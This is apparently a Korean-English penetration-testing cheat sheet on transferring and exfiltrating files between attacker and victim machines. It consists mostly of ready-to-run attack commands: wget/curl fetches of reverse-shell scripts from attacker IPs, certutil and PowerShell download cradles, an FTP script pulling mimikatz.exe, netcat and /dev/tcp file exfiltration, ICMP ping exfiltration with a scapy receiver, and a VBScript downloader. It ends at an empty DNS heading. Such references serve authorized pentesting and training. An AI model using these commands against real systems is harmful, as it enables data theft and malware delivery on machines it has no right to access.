Commonly whitelisted domains to exfiltrate information
Check https://lots-project.com/ to find commonly whitelisted domains that can be abused
Copy&Paste Base64
리눅스
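# Encode a file as base64; -w0 disables line wrapping so the output is one line
base64 -w0 <file>
# Decode a base64 file back to its original bytes
base64 -d file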
윈도우
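REM -encode wraps the base64 in BEGIN/END CERTIFICATE armour lines; -decode strips them again
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll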
HTTP
리눅스
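# -O writes to the given file name; -P only chooses the directory and keeps the remote name
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD (fetch is the base-system downloader)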
윈도우
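REM -urlcache -split -f fetches the URL and writes it to the named file
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
REM bitsadmin /transfer <job name> /priority <level> <remote URL> <local absolute path>
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf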
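#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe", "C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
# In Windows PowerShell "wget" is an alias of Invoke-WebRequest, not GNU wget
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
# $url and $output are placeholders: set them to the source URL and destination path first
Start-BitsTransfer -Source $url -Destination $output
#OR
# An asynchronous job only writes the file once it is finished with Complete-BitsTransfer
Start-BitsTransfer -Source $url -Destination $output -Asynchronous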
파일 업로드
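# Listen for files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world
# Send a file (a bare -H with no header value would swallow the following -F, so it is omitted)
curl -X POST http://HOST/upload -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -F 'files=@file.txt' -u hello:world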
HTTPS 서버
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:443
### PYTHON 2
# Legacy Python 2 module names; on Python 3 these live in http.server.
import BaseHTTPServer , SimpleHTTPServer
import ssl
# SimpleHTTPRequestHandler serves the current working directory.
httpd = BaseHTTPServer . HTTPServer (( '0.0.0.0' , 443 ), SimpleHTTPServer.SimpleHTTPRequestHandler)
# server.pem must hold both the private key and the certificate (see the openssl command above).
httpd . socket = ssl . wrap_socket (httpd.socket, certfile = './server.pem' , server_side = True )
httpd . serve_forever ()
###
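### PYTHON3
from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
# SimpleHTTPRequestHandler serves the current directory, matching the Python 2
# variant above; BaseHTTPRequestHandler has no do_GET and answers 501 to everything.
httpd = HTTPServer(('0.0.0.0', 443), SimpleHTTPRequestHandler)
# ssl.wrap_socket() was deprecated in 3.7 and removed in 3.12: build a
# server-side context and load the combined key+certificate file instead.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile="./server.pem")
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
###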
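### USING FLASK
from flask import Flask, redirect, request  # redirect is imported but unused here
from urllib.parse import quote  # unused in this snippet
app = Flask(__name__)


@app.route('/')
def root():
    """Log the JSON body of a request to '/' and answer "OK"."""
    # NOTE(review): the route accepts only GET by default, so get_json() will
    # usually see no body — confirm which methods the receiver is meant to take.
    # silent=True returns None for a non-JSON body instead of failing the request.
    print(request.get_json(silent=True))
    return "OK"


if __name__ == "__main__":
    # 'adhoc' creates a throw-away self-signed certificate (needs the cryptography package).
    # debug stays off: Flask debug mode exposes the Werkzeug interactive debugger
    # on the bound interface, here 0.0.0.0.
    app.run(ssl_context='adhoc', debug=False, host="0.0.0.0", port=8443)
###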
FTP
FTP 서버 (파이썬)
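pip3 install pyftpdlib
# Serves the current directory on port 21 with anonymous, read-only access by default
python3 -m pyftpdlib -p 21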
FTP 서버 (NodeJS)
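sudo npm install -g ftp-srv --save
# Listen on every interface, port 9876, and serve /tmp as the FTP root
ftp-srv ftp://0.0.0.0:9876 --root /tmp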
FTP 서버 (pure-ftpd)
Copy apt-get update && apt-get install pure-ftp
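#!/bin/bash
#Run the following script to configure the FTP server
groupadd ftpgroup
# -s /etc is a non-executable "shell": the system account cannot log in interactively
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
# pure-pw (not pure-pwd) manages the virtual-user database; -u maps the virtual
# user onto the ftpuser system account and -d sets its home directory
pure-pw useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
# Enable the PureDB authentication backend
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart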
Windows 클라이언트
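REM Works well with python. With pure-ftpd use fusr:ftp
REM Build a scripted session (login, binary mode, fetch, quit) and feed it to ftp with -s
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
REM -n suppresses auto-login so the USER line in the script is used
ftp -n -v -s:ftp.txt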
SMB
Kali를 서버로 사용
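kali_op1 > impacket-smbserver -smb2support kali `pwd` # Share current directory as "kali"
kali_op2 > smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions (unauthenticated guest access to shares is disabled by default)
impacket-smbserver -smb2support -user test -password test test `pwd`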
또는 samba를 사용하여 smb 공유를 생성합니다:
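apt-get install samba
mkdir /tmp/smb
# World-writable so the guest account can write into the share
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart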
윈도우
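CMD-Wind > \\10.10.14.14\path\to\exe
CMD-Wind > net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1 > New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2 > cd new_disk: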
SCP
공격자는 SSHd가 실행 중이어야 합니다.
Copy scp < usernam e > @ < Attacker_I P > : < director y > / < filenam e >
SSHFS
피해자가 SSH를 가지고 있다면, 공격자는 피해자의 디렉토리를 공격자에게 마운트할 수 있다.
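sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
# allow_other lets users other than the mounting one access the mount point
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/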
NC
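# Receiver: listen on 4444 and write whatever arrives to new_file
nc -lvnp 4444 > new_file
# Sender: connect and stream the file from stdin
nc -vn <IP> 4444 < exfil_file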
/dev/tcp
피해자로부터 파일 다운로드
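nc -lvnp 80 > file #Inside attacker
# bash's /dev/tcp pseudo-device opens a TCP connection without any client tool
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim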
피해자에게 파일 업로드
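nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim — the port must match the listener above (the original used 4444 here)
exec 6</dev/tcp/10.10.10.10/80
cat <&6 > file.txt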
thanks to @BinaryShadow_
ICMP
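# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
# This sends 4 bytes per ping packet as the -p pad pattern (you could probably increase this up to 16)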
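from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief


def process_packet(pkt):
    """Print the last 4 payload bytes of each ICMP echo-reply handed over by sniff()."""
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 0:  # type 0 = echo-reply
            data = pkt[ICMP].load[-4:]  # Read the 4 interesting bytes
            # end="" keeps the 4-byte chunks contiguous; flush so output is not buffered
            print(f"{data.decode('utf-8')}", flush=True, end="")


sniff(iface="tun0", prn=process_packet)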
SMTP
SMTP 서버에 데이터를 보낼 수 있다면, 파이썬을 사용하여 데이터를 수신할 SMTP를 생성할 수 있습니다:
Copy sudo python -m smtpd -n -c DebuggingServer :25
TFTP
기본적으로 XP와 2003에서는 (다른 버전에서는 설치 중에 명시적으로 추가해야 함)
Kali에서, TFTP 서버 시작:
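#I didn't get this options working and I prefer the python option
mkdir /tftp
# Serve /tftp on UDP 69 in the background
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp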
파이썬의 TFTP 서버:
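pip install ptftpd
ptftpd -p 69 tap0 . # ptftpd -p <PORT> <IFACE> <FOLDER>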
희생자에서 Kali 서버에 연결합니다:
Copy tftp -i < KALI-I P > get nc.exe
PHP
PHP 원라이너로 파일 다운로드:
Copy echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
VBScript
Copy Attacker > python -m SimpleHTTPServer 80
희생자
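REM Each echo appends one VBScript line; the result is a wget.vbs that takes <url> <outfile>
REM and fetches the URL with WinHttpRequest, writing the body byte by byte to the file.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
REM Fall back through the available HTTP COM objects until one instantiates
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
REM MidB/AscB walk the byte array; Chr(255 And ...) writes each byte unchanged
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs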
Copy cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
Debug.exe
debug.exe
프로그램은 이진 파일을 검사할 수 있을 뿐만 아니라 16진수에서 이진 파일을 재구성할 수 있는 기능도 가지고 있습니다. 이는 이진 파일의 16진수를 제공함으로써 debug.exe가 이진 파일을 생성할 수 있음을 의미합니다. 그러나 debug.exe는 최대 64kb 크기의 파일을 조립하는 데 제한이 있다는 점에 주의해야 합니다.
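# Reduce the size (debug.exe can only assemble files up to 64 KB)
upx -9 nc.exe
# exe2bat emits a batch file that rebuilds the binary through debug.exe
wine exe2bat.exe nc.exe nc.txt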
그런 다음 텍스트를 윈도우 셸에 복사하여 붙여넣으면 nc.exe라는 파일이 생성됩니다.
DNS